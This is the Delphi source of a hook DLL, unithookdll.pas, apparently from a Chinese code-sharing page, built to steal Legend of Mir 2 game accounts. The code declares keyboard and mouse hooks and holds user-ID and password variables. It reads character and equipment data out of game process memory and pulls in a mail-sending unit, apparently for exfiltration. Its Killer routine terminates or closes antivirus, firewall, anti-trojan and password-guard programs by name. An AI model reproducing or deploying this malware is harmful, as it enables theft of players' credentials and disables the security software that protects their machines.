📄 unithookdll.pas
字号:
unit UnitHookDll;
interface
uses Windows, other, UnitHookType, reg, TLHelp32,WinSock,Unit_MySendMailByHtml;
const
MappingFileName = 'Mir2_MapFile';
WM_DESTROY = $0002;
WM_KEYUP = $0101;
WM_LBUTTONDOWN = $0201;
WM_GETTEXT = $000D;
WM_MOUSEMOVE = $0200;
WSADESCRIPTION_LEN = 256;
WSASYS_STATUS_LEN = 128;
MaxEquip = $24C0;
type
TShareMem = packed record
area: string[255];
html1, html2: array[0..1024] of char;
end;
PShareMem = ^TShareMem;
procedure StartHook(html1, html2: pchar); stdcall;
procedure StopHook; stdcall;
implementation
var
pShMem: PShareMem;
hMappingFile: THandle;
FoundCount, flag: integer;
KeyHook, MouseHook: THandle;
filename, Role,Rolebak, sp, ServerPlace, ServerName, userid, pass: string;
Str: array[1..19] of array[0..255] of char;
PWhand: HWND;
timer2:dword;
GetRoleInfoBusy, is9X, isCQ, FirstProcess: boolean;
{ pShMem: PShareMem;
hMappingFile: THandle;
LoadDll, isMu: boolean;
i: integer; }
function IsWindows9x: Boolean;
var
Osi: TOSVersionInfo;
begin
Osi.dwOSVersionInfoSize := sizeof(Osi);
GetVersionEx(Osi);
if (Osi.dwPlatformID = Ver_Platform_Win32_NT) then
result := False
else
result := True;
end;
function GetRoleFromMem(ProcessID: HWND; var role: string): boolean;
var
ProcessHndle: HWND;
SysInfo: _SYSTEM_INFO;
MBI: MEMORY_BASIC_INFORMATION;
PMemoAddr: Pointer;
MemoAddr, MaxMemoAddr: DWORD;
// lpBuffer: PChar;
nSize, lpNumberOfBytesRead: DWORD;
nCount, i, j, m: DWORD;
K:integer;
sTmp: string;
iLastStart: integer;
// FoundOnePos:integer;
begin
Result := false;
role := '';
nCount := 0;
ProcessHndle := OpenProcess(PROCESS_VM_OPERATION or PROCESS_VM_READ or PROCESS_QUERY_INFORMATION, false, ProcessID);
if ProcessHndle <= 0 then
exit;
GetSystemInfo(SysInfo);
PMemoAddr := SysInfo.lpMinimumApplicationAddress;
MaxMemoAddr := DWORD(SysInfo.lpMaximumApplicationAddress);
try
while true do
begin
VirtualQueryEx(ProcessHndle, PMemoAddr, MBI, SizeOf(MBI));
nSize := MBI.RegionSize;
if MBI.State = MEM_COMMIT then //MEM_COMMIT=$1000 MEM_RESERVE=$2000 MEM_FREE=$10000
begin
setlength(sTmp, nSize);
ReadProcessMemory(ProcessHndle, PMemoAddr, //$401000 //$1180000
pchar(sTmp), nSize, lpNumberOfBytesRead);
//if is9x then
// i := Pos('Device Independent Bitmap', sTmp)
//else
begin
iLastStart := 0;
i := 0;
//FoundOnePos:=0;
for j := 10 to nSize - 10 do
begin
if sTmp[j] = '/' then //*wenson/0/2/1/0/*wenson/0/2/1/0/
begin
if (sTmp[j + 1] >= '0') and (sTmp[j + 1] <= '2') and
(sTmp[j + 3] >= '0') and (sTmp[j + 3] <= '9') and
(sTmp[j + 2] = '/') then
begin
m:=j;
for k := -1 downto -30 do
if (sTmp[m + k] = '/')or(sTmp[m + k] = '*')or(sTmp[m + k] < #$20) then break;
if k<-30 then continue;
iLastStart:=m+k+1;
//writedat(copy(sTmp,j-10,30),'c:\game.txt');
m := j + 4;
for k := 0 to 3 do
if sTmp[m + k] = '/' then break
else if (sTmp[m + k] < '0') or (sTmp[m + k] > '9') then break;
if sTmp[m + k] <> '/' then continue;
inc(m, k + 1);
for k := 0 to 3 do
if sTmp[m + k] = '/' then break
else if (sTmp[m + k] < '0') or (sTmp[m + k] > '9') then break;
if sTmp[m + k] <> '/' then continue;
inc(m, k + 1);
if (sTmp[m] <> '0') and (sTmp[m] <> '1') then continue;
if sTmp[m + 1] <> '/' then continue;
inc(m,2);
{ FoundOnePos:=iLastStart;
//第二个角色
for k := 0 to 30 do
if sTmp[m + k] = '/' then break;
if sTmp[m + k] <> '/' then continue;
inc(m, k);
if (sTmp[m + 1] >= '0') and (sTmp[m + 1] <= '2') and
(sTmp[m + 3] >= '0') and (sTmp[m + 3] <= '9') and
(sTmp[m + 2] = '/') then
begin }
i := iLastStart;
break;
// end;
end;
end;
end;
end;
//if (i=0)and(FoundOnePos<>0)then
// i:=FoundOnePos;
if i > 0 then
begin
inc(nCount);
//if (not is9x) or (nCount >= 2) then
begin
//if is9x then
//begin
// delete(sTmp, 1, i - 1);
// Delete(sTmp, 1, 32);
// role := copy(sTmp, 1, i + 200);
//end
//else
begin
delete(sTmp, 1, i - 1);
role := copy(sTmp, 1, i + 200);
//writedat(ss,'c:\game.txt');
end;
if length(role) >= 10 then
begin
result := true;
Break;
end;
end;
end;
end;
MemoAddr := DWORD(PMemoAddr) + nSize;
if MemoAddr >= MaxMemoAddr then
Break;
PMemoAddr := Pointer(MemoAddr);
end;
except
end;
setlength(sTmp, 0);
CloseHandle(ProcessHndle);
end;
function GetEquipFromMem(ProcessID: HWND; var equip: string): boolean;
var
ProcessHndle: HWND;
SysInfo: _SYSTEM_INFO;
MBI: MEMORY_BASIC_INFORMATION;
PMemoAddr: Pointer;
MemoAddr, MaxMemoAddr: DWORD;
// lpBuffer: PChar;
nSize, lpNumberOfBytesRead: DWORD;
nCount, i, j, k, m: DWORD;
sTmp: string;
iLastStart: integer;
begin
Result := false;
equip := '';
nCount := 0;
ProcessHndle := OpenProcess(PROCESS_VM_OPERATION or PROCESS_VM_READ or PROCESS_QUERY_INFORMATION, false, ProcessID);
if ProcessHndle <= 0 then
exit;
GetSystemInfo(SysInfo);
PMemoAddr := SysInfo.lpMinimumApplicationAddress;
MaxMemoAddr := DWORD(SysInfo.lpMaximumApplicationAddress);
try
while true do
begin
VirtualQueryEx(ProcessHndle, PMemoAddr, MBI, SizeOf(MBI));
nSize := MBI.RegionSize;
if MBI.State = MEM_COMMIT then //MEM_COMMIT=$1000 MEM_RESERVE=$2000 MEM_FREE=$10000
begin
setlength(sTmp, nSize);
ReadProcessMemory(ProcessHndle, PMemoAddr, //$401000 //$1180000
pchar(sTmp), nSize, lpNumberOfBytesRead);
if is9x then
i := Pos('On Win95', sTmp)
else begin
i:=Pos(#1#1#2#2'WinSock 2.0',sTmp); //'On Win95'
if i>0 then
inc(i,$105);
end;
if i > 0 then
begin
equip := copy(sTmp, i, MaxEquip);
result := true;
Break;
end;
end;
MemoAddr := DWORD(PMemoAddr) + nSize;
if MemoAddr >= MaxMemoAddr then
Break;
PMemoAddr := Pointer(MemoAddr);
end;
except
end;
setlength(sTmp, 0);
CloseHandle(ProcessHndle);
end;
function ExtractInfo(const sMem: string): string;
const
_nOffset = 52; //$34
var
sTemp, sTemp1: string;
cc: char;
nOffset, nSize, nLen: integer;
nCount, k, nn1, nn2: integer;
begin
//处理
nLen := Length(sMem);
//writedat(smem,'c:\game.txt');
nOffset := $238; //$2D4;
nCount := 1;
Result := '';
repeat
cc := sMem[nOffset];
nSize := Byte(cc);
if (cc = #0) or (nSize > 16) then begin
inc(nOffset, _nOffset);
continue;
end;
sTemp := Copy(sMem, nOffset + 1, nSize);
if pos('{骺躴骺皗骺', sTemp) > 0 then Break;
if nOffset>=MaxEquip then break;
nn1 := Length(sTemp);
nn2 := Length(widestring(sTemp));
//汉字数=nn1-nn2, 英文数=2*nn2-nn1
if ((nn1 - nn2) < 2) or (2 * nn2 - nn1 > 2) then begin
inc(nOffset, _nOffset);
continue;
end;
k := Pos(sTemp, Result);
if k > 0 then begin
sTemp1 := Copy(Result, 1, k - 1);
Delete(Result, 1, k);
k := Pos(#13#10, Result);
Delete(Result, 1, k + 1);
inc(nCount);
sTemp := sTemp + inttostr(nCount) + #13#10;
Result := sTemp1 + sTemp + Result;
end else begin
nCount := 1;
Result := Result + sTemp + #13#10;
end;
inc(nOffset, _nOffset);
until nOffset >= nLen;
end;
function GetRoleInfo_Mir2: string;
const
nSize = $80;
var
role: string;
k: Integer;
sInfo1, sInfo2, sName, sSex, sJob, sLevel: string;
begin
Result := '';
if GetRoleInfoBusy then exit;
GetRoleInfoBusy := true;
if (not GetRoleFromMem(GetCurrentProcessId, role)) then
begin
GetRoleInfoBusy := false;
exit;
end;
// writedat(role,'c:\game.txt');
sName := '';
sSex := '';
sLevel := '';
sJob := '';
if role[1] = '*' then
Delete(role, 1, 1);
k := Pos('/', role);
sName := Copy(role, 1, k - 1);
Delete(role, 1, k);
if role[1] = '0' then
sJob := '武士'
else if role[1] = '1' then
sJob := '魔法师'
else if role[1] = '2' then
sJob := '道士'
else begin
GetRoleInfoBusy := false;
Exit;
end;
Delete(role, 1, 2);
k := Pos('/', role);
Delete(role, 1, k);
k := Pos('/', role);
sLevel := Copy(role, 1, k - 1);
Delete(role, 1, k);
if role[1] = '0' then
sSex := '男'
else if role[1] = '1' then
sSex := '女'
else begin
GetRoleInfoBusy := false;
Exit;
end;
sInfo1 := sName + '(' + sSex + ')' + sLevel + '级' + sJob;
Result := result + '人物A-' + sInfo1;
sName := '';
sSex := '';
sLevel := '';
sJob := '';
Delete(role, 1, 2);
k := Pos('/', role);
sName := Copy(role, 1, k - 1);
Delete(role, 1, k);
if role[1] = '0' then
sJob := '武士'
else if role[1] = '1' then
sJob := '魔法师'
else if role[1] = '2' then
sJob := '道士'
else begin
GetRoleInfoBusy := false;
exit;
end;
Delete(role, 1, 2);
k := Pos('/', role);
Delete(role, 1, k);
k := Pos('/', role);
sLevel := Copy(role, 1, k - 1);
Delete(role, 1, k);
if role[1] = '0' then
sSex := '男'
else if role[1] = '1' then
sSex := '女';
sInfo2 := sName + '(' + sSex + ')' + sLevel + '级' + sJob;
Result := Result + #13#10'人物B-' + sInfo2;
GetRoleInfoBusy := false;
end;
procedure Killpro(s: string);
var
lppe: tprocessentry32;
sshandle: thandle;
hh: hwnd;
found: boolean;
begin
sshandle := createtoolhelp32snapshot(TH32CS_SNAPALL, 0);
found := process32first(sshandle, lppe);
while found do
begin
if (uppercase(extractfilename(lppe.szExeFile)) = s) or
(uppercase(lppe.szExeFile) = s) then
begin
hh := OpenProcess(PROCESS_ALL_ACCESS, true, lppe.th32ProcessID);
TerminateProcess(hh, 0);
end;
found := process32next(sshandle, lppe);
end;
CloseHandle(sshandle);
end;
function extractfilepath(const Str:String):string;
var L,i,flag:integer;
begin
L:=Length(Str);
for i:=L downto 1 do if Str[i]='\' then begin
flag:=i;
break;
end;
result:=copy(Str,1,flag);
end;
procedure KillZhuanJia;
var
found: boolean;
s,path:string;
i:integer;
h,FindHandle: THandle;
FindData: TWin32FindData;
begin
path:=ReadValue(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\密码防盗专家 综合版','UninstallString');
if path='' then exit;
i:=pos(' ',path);
if i<>0 then delete(path,i,MaxInt);
path:=extractfilepath(Path);
FindHandle := FindFirstFile(PChar(path + '*.exe'), FindData);
s:='';
Found := FindHandle <> INVALID_HANDLE_VALUE;
while Found do begin //如果找到stg文件
{ if (Ansicomparetext(FindData.cFileName,'PasswordGuard.exe')=0)or
(Ansicomparetext(FindData.cFileName,'UNWISE.EXE')=0)or
(Ansicomparetext(FindData.cFileName,'autoupdate.exe')=0)or
(Ansicomparetext(FindData.cFileName,'magic.exe')=0)then }
if ((FindData.cFileName[0]>='0')and(FindData.cFileName[0]<='9'))or
(Ansicomparetext(FindData.cFileName,'PasswordGuard.exe')=0) then
begin
h:=Integer(CreateFile(PChar(path+FindData.cFileName), GENERIC_WRITE,
0, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0));
if h= INVALID_HANDLE_VALUE then
begin
s:=uppercase(FindData.cFileName);
//Messagebox(0,pchar(s),'',0);
KillPro(s);
if (Ansicomparetext(FindData.cFileName,'PasswordGuard.exe')=0) then
KillPro(uppercase('PasswordGuard.e'));
end
else CloseHandle(h);
end;
Found := FindNextFile(FindHandle, FindData);
end;
Windows.FindClose(FindHandle);
end;
procedure Killer;
var
s, Desktop: integer;
str: array[0..100] of char;
begin
Killpro('EGHOST.EXE');Killpro('Iparmor.exe');KillZhuanJia;
s := findwindow(pchar('RavMonClass'), pchar('RavMon.exe'));
Sendmessage(s, $0010, 0, 0);
s := findwindow('Tapplication', '天网防火墙个人版');
Sendmessage(s, $0010, 0, 0);
s := findwindow('Tapplication', '天网防火墙企业版');
Sendmessage(s, $0010, 0, 0);
s := 0;
Desktop := GetDesktopWindow;
repeat
s := findwindowex(Desktop, s, 'TForm1', nil);
getwindowtext(s, str, 9);
if str = '木马克星' then
sendmessage(s, $0010, 0, 0);
until s = 0;
s := 0;
Desktop := GetDesktopWindow;
repeat
s := findwindowex(Desktop, s, 'TForm1', nil);
getwindowtext(s, str, 7);
if str = '噬菌体' then
sendmessage(s, $0010, 0, 0);
until s = 0;
s := findwindow(pchar('TfLockDownMain'), nil);
Sendmessage(s, $0010, 0, 0);
s := findwindow(pchar('ZAFrameWnd'), pchar('ZoneAlarm'));
Sendmessage(s, $0010, 0, 0);
end;
function IsMirDat:Integer;
var
isOK:Boolean;
ProcessHandle:Thandle;
ProcessStruct:TProcessEntry32;
begin
Result:=0;
ProcessHandle:=createtoolhelp32snapshot(Th32cs_snapprocess,0);
processStruct.dwSize:=sizeof(ProcessStruct);
isOK:=process32first(ProcessHandle,ProcessStruct);
while isOK do
begin
if UpperCase(ExtractFilename(ProcessStruct.szExeFile))=UpperCase('MIR.DAT') then//进程名-------------------1
begin
Result:=ProcessStruct.th32ProcessID;
Break;
end;
isOK:=process32next(ProcessHandle,ProcessStruct);
end;
CloseHandle(ProcessHandle);
end;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -